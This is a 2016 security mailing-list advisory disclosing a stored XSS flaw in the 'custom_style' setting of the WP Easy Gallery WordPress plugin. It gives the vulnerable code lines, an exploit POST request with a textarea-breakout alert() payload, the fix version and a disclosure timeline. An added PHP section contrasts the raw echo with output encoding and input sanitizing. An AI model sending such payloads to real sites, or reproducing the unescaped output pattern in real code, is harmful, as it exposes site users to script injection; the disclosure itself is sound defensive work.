Message-ID: <56A742A3.9080504@gmail.com>
Date: Tue, 26 Jan 2016 15:25:47 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: bugtraq@...urityfocus.com
Subject: WP Easy Gallery v4.1.4 Stored XSS Vulnerability

#Product    : WP Easy Gallery
#Exploit Author  : Rahul Pratap Singh
#Version    : 4.1.4
#Home page Link  : https://wordpress.org/plugins/wp-easy-gallery
#Website   : 0x62626262.wordpress.com
#Linkedin  : https://in.linkedin.com/in/rahulpratapsingh94
#Date      : 26/Jan/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
The "custom_style" parameter is not sanitized, which leads to stored XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: wpeg-settings.php

Found at line: 12
$temp_defaults['custom_style'] = isset($_POST['custom_style']) ? $_POST['custom_style'] : '';

Found at line: 103
<td><textarea name="custom_style" id="custom_style" rows="4" cols="40"><?php _e($default_options['custom_style']); ?></textarea></td>

----------------------------------------
Exploit:
----------------------------------------
POST /wp-admin/admin.php?page=wpeg-settings

wpeg_settings=3b59e6c6ef&_wp_http_referer=abc&display_mode=abc&num_columns=abc&show_gallery_name=abc&gallery_name_alignment=abc&use_default_style=abc&drop_shadow=abc&custom_style=</textarea><input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)><!--&defaultSettings=xss&Submit=Save

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/easy-gallery-settingsxsspoc.png

Fix:
Update to 4.1.5

Disclosure Timeline:
reported to wordpress  : 18/1/2016
wordpress response (plugin taken down) : 19/1/2016
vendor deployed a patch : 26/1/2016

#######################################
#       CTG SECURITY SOLUTIONS       #
#    www.ctgsecuritysolutions.com    #
#######################################

Pub ref:
https://0x62626262.wordpress.com/2016/01/26/wp-easy-gallery-v4-1-4-stored-xss-vulnerability/
https://wordpress.org/plugins/wp-easy-gallery/changelog/

Download attachment "0x9ACF7D5F.asc" of type "application/pgp-keys" (3134 bytes)

Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)
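
Added example (not part of the original advisory and not the vendor's 4.1.5 patch): plain PHP that reproduces the output pattern from line 103 next to a hardened version, so the effect of encoding the stored custom_style value can be checked without a WordPress install. The function names are hypothetical; in a WordPress plugin, esc_textarea() is the output-escaping helper for this context.

```php
<?php
// Constructed sample: the custom_style value from the advisory's request, URL-decoded.
$stored = '</textarea><input type=text onclick=alert(/XSS/)><!--';

// Pattern from wpeg-settings.php line 103: the stored value is echoed raw
// into the body of the textarea element.
function render_vulnerable(string $value): string {
    return '<textarea name="custom_style" id="custom_style" rows="4" cols="40">'
         . $value . '</textarea>';
}

// Hardened output: encode HTML metacharacters so the value can only ever be
// text content of the textarea, never markup.
function render_hardened(string $value): string {
    return '<textarea name="custom_style" id="custom_style" rows="4" cols="40">'
         . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
         . '</textarea>';
}

// Hardened input (defence in depth for line 12): a CSS setting never needs
// HTML, so strip tags and any leftover '<' before the value is saved.
function sanitize_custom_style(string $value): string {
    return trim(str_replace('<', '', strip_tags($value)));
}

// True when the rendered field was terminated early or gained an extra element.
function breaks_out_of_textarea(string $html): bool {
    return substr_count(strtolower($html), '</textarea>') > 1
        || stripos($html, '<input') !== false;
}

$cases = [
    'raw echo (4.1.4 pattern)'   => render_vulnerable($stored),
    'encoded on output'          => render_hardened($stored),
    'sanitized on input + raw'   => render_vulnerable(sanitize_custom_style($stored)),
    'sanitized + encoded (both)' => render_hardened(sanitize_custom_style($stored)),
];

foreach ($cases as $label => $html) {
    printf("%-28s breaks out: %s\n", $label, breaks_out_of_textarea($html) ? 'YES' : 'no');
}
```

Output encoding is the control that matters for values already in the database; input sanitization alone does not neutralize entries saved before the fix.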
